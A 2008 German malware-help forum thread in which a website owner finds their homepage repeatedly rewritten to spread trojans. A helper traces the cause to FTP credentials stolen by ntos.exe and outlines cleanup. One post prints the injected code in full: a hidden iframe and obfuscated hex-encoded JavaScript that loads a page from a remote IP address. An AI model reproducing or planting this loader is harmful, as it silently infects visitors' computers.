Zurück   Trojaner-Board > Malware entfernen > Plagegeister aller Art und deren Bekämpfung

Plagegeister aller Art und deren Bekämpfung: hp verteilt trojaner

Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen.

Antwort
Alt 08.03.2008, 19:14   #1
knuffiwuffi
 
hp verteilt trojaner - Standard

hp verteilt trojaner



Hallo...ich bräuchte dringend profesionelle Hilfe...

Meine erste hp mit DW CS3 erstellt wurde vor 1 Woche auf meinen 1&1 Webspace geladen. Nachdem sich 2 Personen einen Trojaner eingefangen und getilgt haben, überprüfte ich meinen PC mit Antivir. Dieser hat 8 Trojaner entdeckt und gelöscht. Meine Seite wurde natürlich sofort vom Space genommen. Nachdem mein eigenes System gesäubert war, habe ich die Dateien mit FTP DW wieder auf den Space geladen. Alles gut, keine Warnung. Auch Freunde haben keine Warnung mehr bekommen. Dann war ich grad bei einem Freund bei dem Antivir beim öffnen meiner Seite wieder ausgeflippt ist. Trojaner hier und da. Der 1&1 Support sagt es wäre alles sauber auf meiner HP. Da ich nun etwas verwirrt bin, möchte ich euch bitten einmal meine HP zu prüfen...wer sich trautDie Adresse gibt es als PM...Danke

PS: Bis auf "lightbox" wurden keine externen Skripte oder Werbung eingebunden

Edit:
Also...ich habe grad bei 1&1 erneut angerufen und die haben keine Viruswarnung bekommen. Die Seite sollte also sauber sein laut 1&1 techniker. Wieso nur hat mein Freund diese Warnungen bekommen als er meine Seite aufgerufen hat?

Geändert von knuffiwuffi (08.03.2008 um 19:28 Uhr)

Alt 09.03.2008, 05:01   #2
KarlKarl
/// Helfer-Team
 
hp verteilt trojaner - Standard

hp verteilt trojaner



Hi,

kannst mir ja mal die Adresse PNen, Sonntag werde ich aber nicht sehr viel Online sein, ich schau aber ma rein, könnte aber Montag werden. Trifft sich auch gut, ich habe hier ein Antivir am laufen.

Gruß, Karl
__________________


Alt 10.03.2008, 00:10   #3
knuffiwuffi
 
hp verteilt trojaner - Standard

hp verteilt trojaner



zunächst mal danke an karl...er hat den plagegeist bereits aufgefunden...nun zu meinem problem...meine index wird immer wieder auf dem space bei 1&1 umgeschrieben...folgender eintrag fügt sich serverseitig dem body automatisch hinzu und kann nicht gelöscht werden:

<iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v47d466a20a2a6(v47d466a20aa1a){ function v47d466a20b222 () {return 16;} return(parseInt(v47d466a20aa1a,v47d466a20b222()));}function v47d466a20c213(v47d466a20ca0e){ function v47d466a20e1f6 () {return 2;} var v47d466a20d205='';for(v47d466a20d9fc=0; v47d466a20d9fc<v47d466a20ca0e.length; v47d466a20d9fc+=v47d466a20e1f6()){ v47d466a20d205+=(String.fromCharCode(v47d466a20a2a6(v47d466a20ca0e.substr(v47d466a20d9fc, v47d466a20e1f6()))));}return v47d466a20d205;} document.write(v47d466a20c213('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D383 633393033333130666431207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6 D28292A313238333830292B27375C272077696474683D353234206865696768743D323435207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5 343524950543E'));</script>

Ich habe die index neu erstellt und ohne diesen unsichtbaren iframe auf den space geladen...verbindung über ftp geschlossen...für 1h alles ok und sauber...und nach dieser einen stunde sehe ich, daß sich die index auf dem space wieder verändert hat. selbes skript...kann es sein, daß sich da noch unsichtbar etwas auf dem 1&1 space befindet und meine index umschreibt? ich bin schon etwas verzweifelt, zumal der 1&1 support das problem nicht einmal findet.

Hilfe!!!
__________________

Alt 10.03.2008, 02:00   #4
knuffiwuffi
 
hp verteilt trojaner - Standard

hp verteilt trojaner



ich vermute einen zusammenhang mit der bösen ntos.exe die mir spybot immer angezeigt hat aber nicht löschen konnte. mit sdfix die ntox.exe und seine freunde gelöschen. antivir und spybot lasse ich grad über das system laufen. mal sehen ob nun alles sauber ist. dann das ftp pw ändern. vermutlich werde ich nicht drum herum kommen meinen pc neu aufzusetzen. klasse wie hartneckig solche viren und trojaner sein können. möchte mal wissen wer so etwas schreibt.

Alt 10.03.2008, 02:15   #5
KarlKarl
/// Helfer-Team
 
hp verteilt trojaner - Standard

hp verteilt trojaner



Ok, dann haben wir zumindestens einen Weg, über den das passieren kann. Eine der Spzialitäten von ntos.exe ist das abgreifen von Passwörtern. Damit ist der Weg auf deinen Webspace natürlich offen. Also kannst Du dir erstmal das Wühlen in ewig langen Serverlogs wohl sparen. Benachrichtige deinen Provider, dass er die Seite erstmal offline stellt, damit sie nicht andere Systeme infizieren kann. Dann formaitier die Platte und setz dein System auf. Danach brauchst Du ein neues FTP-Passwort, erst danach, sonst wäre es sofort wieder verraten. Nun kannst Du deinen Webspace in Ordnung bringen und die Seite wieder online stellen. Dann mal sehen, ob sie wieder verändert wird. Sollte es passieren, dann mal die Serverlogs vornehmen.


Alt 11.03.2008, 17:01   #6
knuffiwuffi
 
hp verteilt trojaner - Standard

hp verteilt trojaner



So...Danke für die Hilfe...ich konnte mein System säubern (ntos.exe war wohl der Haupttäter) mit SDFIX, und nachdem ich mein FTP PW für den Space mit meinem sauberen System geändert und die Seite neu hochgeladen habe wurde ich auch in Ruhe gelassen. Mal sehen wie lange

Antwort

Themen zu hp verteilt trojaner
adresse, bräuchte, cs3, dateien, dringend, eingefangen, entdeck, entdeckt, erneut, erstell, erstellt, freunde, ftp, natürlich, personen, sauber, seite, support, system, trojane, trojaner, trojaner eingefangen, viruswarnung, warnungen, webspace, werbung, woche, öffnen




Ähnliche Themen: hp verteilt trojaner


  1. Anti-Adblock-Spezialist Pagefair verteilt Malware
    Nachrichten - 02.11.2015 (0)
  2. Malvertising-Kampagne verteilt Exploit-Kit über ebay.de
    Nachrichten - 23.10.2015 (0)
  3. Gefälschte EFF-Webseite verteilt Spionage-Trojaner
    Nachrichten - 01.09.2015 (0)
  4. Windows 10 verteilt WLAN-Schlüssel an Freunde
    Nachrichten - 09.07.2015 (0)
  5. Nie wieder Patchday: Wie Microsoft in Zukunft Updates verteilt
    Nachrichten - 06.05.2015 (1)
  6. Erpressung mit Kinderpornos: Exploit-Kit Angler verteilt Android-Trojaner
    Nachrichten - 12.11.2014 (0)
  7. Gefälschte iOS-Apps per Enterprise-Zertifikat auf Geräten verteilt
    Nachrichten - 11.11.2014 (0)
  8. serienjunkies.org verteilt Backdoor.PoisonIvy Trojaner
    Diskussionsforum - 28.05.2013 (0)
  9. Spam-Emails werden an meine Kontakte verteilt...
    Plagegeister aller Art und deren Bekämpfung - 30.01.2013 (2)
  10. Angebliche Sparkassen-Mail verteilt Links zu Torpig
    Nachrichten - 05.07.2012 (0)
  11. Telekom verteilt Smartphone-Sicherheitssoftware von Lookout
    Nachrichten - 23.04.2012 (0)
  12. Meine Website verteilt Trojaner - und ich weiß nichts davon?
    Plagegeister aller Art und deren Bekämpfung - 28.12.2011 (0)
  13. Fehlalarm: Twitter-Hauptseite verteilt angeblich Malware
    Nachrichten - 28.09.2010 (0)
  14. IBM verteilt auf Sicherheitskonferenz infizierte USB-Sticks
    Nachrichten - 21.05.2010 (0)
  15. Microsoft verteilt wieder Bluescreen-Patch
    Nachrichten - 03.03.2010 (0)
  16. Hohe CPU Auslastung willkürlich verteilt bei Grafikanwendungen (Spielen)
    Log-Analyse und Auswertung - 16.11.2009 (0)

Zum Thema hp verteilt trojaner - Hallo...ich bräuchte dringend profesionelle Hilfe... Meine erste hp mit DW CS3 erstellt wurde vor 1 Woche auf meinen 1&1 Webspace geladen. Nachdem sich 2 Personen einen Trojaner eingefangen und getilgt - hp verteilt trojaner...
Archiv
Du betrachtest: hp verteilt trojaner auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.